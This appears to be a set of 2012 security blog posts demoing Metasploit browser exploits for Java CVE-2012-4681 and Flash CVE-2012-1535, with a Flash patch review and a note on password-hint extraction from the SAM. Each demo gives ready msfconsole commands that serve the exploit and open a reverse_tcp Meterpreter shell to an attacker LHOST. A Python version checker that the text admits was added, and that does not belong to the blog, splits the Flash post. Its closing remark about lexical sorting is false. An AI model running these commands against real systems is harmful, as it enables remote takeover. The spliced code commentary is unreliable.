Java 7 Applet RCE 0day Gondvv CVE-2012-4681 Metasploit Demo

Timeline :

Vulnerability reported to ZDI by James Forshaw (tyranid)
Vulnerability reported to the vendor by ZDI on 2012-07-24.
Vulnerability found exploited in the wild and discovered by Michael Schierl
First details of the vulnerability published on 2012-08-26
Source code of the exploit provided by jduck on 2012-08-26
Metasploit PoC provided on 2012-08-27
Patched through the out-of-band Oracle Security Alert for CVE-2012-4681 on 2012-08-30.

PoC provided by :

Unknown
jduck
sinn3r
juan vazquez

Reference(s) :

CVE-2012-4681
OSVDB-84867
BID-55213
Zero-Day Season is Not Over Yet
Java 7 0-Day vulnerability information and mitigation
ZDI-12-197
Oracle Security Alert for CVE-2012-4681

Affected version(s) :

Oracle JSE (Java Standard Edition) version 1.7.0_06-b24 and previous.

Tested on Windows XP Pro SP3 & Ubuntu 12.04 with :

Internet Explorer 8 & Firefox 14.0.1 & Chrome
Oracle JSE 1.7.0_06-b24

Description :

This module exploits a vulnerability in Java 7, which allows an attacker to run arbitrary Java code outside the sandbox. This flaw is also being exploited in the wild, and there is no patch from Oracle at this point. The exploit has been tested to work against: IE, Chrome and Firefox across different platforms.

Commands :

use exploit/multi/browser/java_jre17_exec
set SRVHOST 192.168.178.100
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

sysinfo
getuid

Windows 0day exploitation with Internet Explorer, Firefox and Chrome :

Linux Ubuntu 12.04 exploitation with Firefox :

Adobe APSB12-19 Flash Player Update Review

Adobe released, on 21 August 2012, just one week after its Patch Tuesday release, an out-of-band patch APSB12-19 updating Flash Player 10.x and 11.x. This update corrects 6 vulnerabilities, all of which have a Critical severity rating, and 5 of the 6 have a base CVSS score of 10.0.

CVE-2012-4163, with a CVSS base score of 10.0, which could lead to code execution, was discovered and privately reported by Xu Liu of Fortinet's FortiGuard Labs.

CVE-2012-4164, with a CVSS base score of 10.0, which could lead to code execution, was discovered and privately reported by Will Dormann of CERT.

CVE-2012-4165 and CVE-2012-4166, both with a CVSS base score of 10.0, which could lead to code execution, were discovered and privately reported by Honggang Ren of Fortinet's FortiGuard Labs.

CVE-2012-4167, with a CVSS base score of 10.0, which could lead to code execution, was discovered and privately reported by Alexander Gavrun through iDefense's Vulnerability Contributor Program.

CVE-2012-4168, with a CVSS base score of 4.3, which could lead to an information leak, was discovered and privately reported by Opera Software ASA.

Metasploit Windows User Password Hints Decode Auxiliary Modules

Metasploit provides some Microsoft Windows auxiliary modules which let you dump local accounts from the SAM database. These modules, "post/windows/gather/hashdump" and "post/windows/gather/smart_hashdump", have recently been updated to also retrieve Windows user password hints. A nice blog post, "All Your Password Hints Are Belong to Us" by claudijd, explains how they successfully extracted and decoded user password hints from the Windows registry. Below is a short video demonstration of these modifications.

Nice job from @claudijd, @reynoldsrb, @_sinn3r and @TheLightCosine for these nice upgrades 🙂

CVE-2012-1535 Adobe Flash Player Vulnerability Metasploit Demo

Timeline :

Vulnerability found exploited in the wild and reported by Alexander Gavrun
Vulnerability reported by the vendor on 2012-08-14
Metasploit PoC provided on 2012-08-17

PoC provided by :

Alexander Gavrun
juan vazquez
sinn3r

Reference(s) :

APSB12-18
CVE-2012-1535
OSVDB-84607
BID-55009

Affected version(s) :

Adobe Flash Player 11.3.300.270 and earlier versions for Windows and Macintosh
Adobe Flash Player 11.2.202.236 and earlier versions for Linux
Flash Player installed with Google Chrome in versions earlier than 21.0.1180.79.
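The affected-version lists in the CVE-2012-4681 (Oracle JSE 1.7.0_06-b24 and previous) and CVE-2012-1535 (Flash Player 11.3.300.270 / 11.2.202.236 and earlier, Chrome before 21.0.1180.79) posts are what an administrator checks an inventory against. The following Python is an added example, not part of this blog or of the Metasploit modules: it parses Java, Flash Player and Chrome version strings and reports whether each falls inside the ranges quoted on this page. The function names, the platform keys and the sample inputs are my own.

```python
import re

# Affected-version ceilings as quoted on this page (assumed to be the
# complete scope; adjust if the vendor advisory says otherwise).
JAVA7_LAST_AFFECTED = (1, 7, 0, 6)  # Oracle JSE 1.7.0_06 and previous
FLASH_LAST_AFFECTED = {
    "windows": (11, 3, 300, 270),  # 11.3.300.270 and earlier
    "mac": (11, 3, 300, 270),
    "linux": (11, 2, 202, 236),    # 11.2.202.236 and earlier
}
CHROME_FIRST_FIXED = (21, 0, 1180, 79)  # bundled Flash fixed from this build

# Bare Java version: major.minor.patch[_update][-bNN]
_JAVA_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)(?:_(\d+))?(?:-b\d+)?$")


def parse_java_version(text):
    """Return (major, minor, patch, update) from a bare version string such
    as '1.7.0_06-b24' or from the first line of `java -version` output,
    e.g. 'java version "1.7.0_06"'. The -bNN build suffix is ignored
    because the advisory ceiling is expressed at the update level."""
    quoted = re.search(r'"([^"]+)"', text)
    if quoted:
        text = quoted.group(1)
    m = _JAVA_RE.match(text.strip())
    if not m:
        raise ValueError("unrecognised Java version string: %r" % text)
    major, minor, patch, update = m.groups()
    return (int(major), int(minor), int(patch), int(update or 0))


def java_affected_by_cve_2012_4681(text):
    """True for a Java 7 runtime at or below 1.7.0_06. Java 6 runtimes are
    reported as not affected, matching the Java 7 scope of the advisory."""
    v = parse_java_version(text)
    return v[:2] == (1, 7) and v <= JAVA7_LAST_AFFECTED


def parse_dotted_version(text):
    """Parse a four-part dotted version such as '11.3.300.268' into a tuple
    of ints so that Python's tuple comparison orders it correctly."""
    parts = text.strip().split(".")
    if len(parts) != 4 or not all(p.isdigit() for p in parts):
        raise ValueError("expected a.b.c.d version, got %r" % text)
    return tuple(int(p) for p in parts)


def flash_affected_by_cve_2012_1535(text, platform):
    """True when a standalone or browser-plugin Flash Player is at or below
    the ceiling quoted for its platform ('windows', 'mac' or 'linux')."""
    ceiling = FLASH_LAST_AFFECTED[platform.lower()]
    return parse_dotted_version(text) <= ceiling


def chrome_bundled_flash_affected(text):
    """True for Chrome builds earlier than 21.0.1180.79, whose bundled
    Flash Player predates the fix."""
    return parse_dotted_version(text) < CHROME_FIRST_FIXED


if __name__ == "__main__":
    # Constructed sample inventory lines (hostname, product, version).
    inventory = [
        ("ws01", "java", 'java version "1.7.0_06"'),
        ("ws02", "java", "1.7.0_07"),
        ("ws03", "java", "1.6.0_33"),
        ("ws01", "flash/windows", "11.3.300.268"),
        ("srv01", "flash/linux", "11.2.202.238"),
        ("ws04", "chrome", "21.0.1180.75"),
    ]
    for host, product, version in inventory:
        if product == "java":
            hit = java_affected_by_cve_2012_4681(version)
        elif product.startswith("flash/"):
            hit = flash_affected_by_cve_2012_1535(version, product.split("/")[1])
        else:
            hit = chrome_bundled_flash_affected(version)
        print("%-6s %-14s %-24s %s" % (host, product, version,
                                       "AFFECTED" if hit else "ok"))
```

Comparing as integer tuples rather than as strings matters here: "11.3.300.268" sorts after "11.3.300.271" lexically but below it numerically, and the update field of a Java string ("_06" vs "_10") has the same problem.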

Tested on Windows 7 Integral with :

Internet Explorer 9
Adobe Flash Player 11.3.300.268

Description :

This module exploits a vulnerability found in the ActiveX component of Adobe Flash Player before 11.3.300.271. By supplying a corrupt Font file used by the SWF, it is possible to gain arbitrary remote code execution under the context of the user, as exploited in the wild.

Commands :

use exploit/windows/browser/adobe_flash_otf_font
set SRVHOST 192.168.178.100
set ROP JRE
set TARGET 6
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

sysinfo
getuid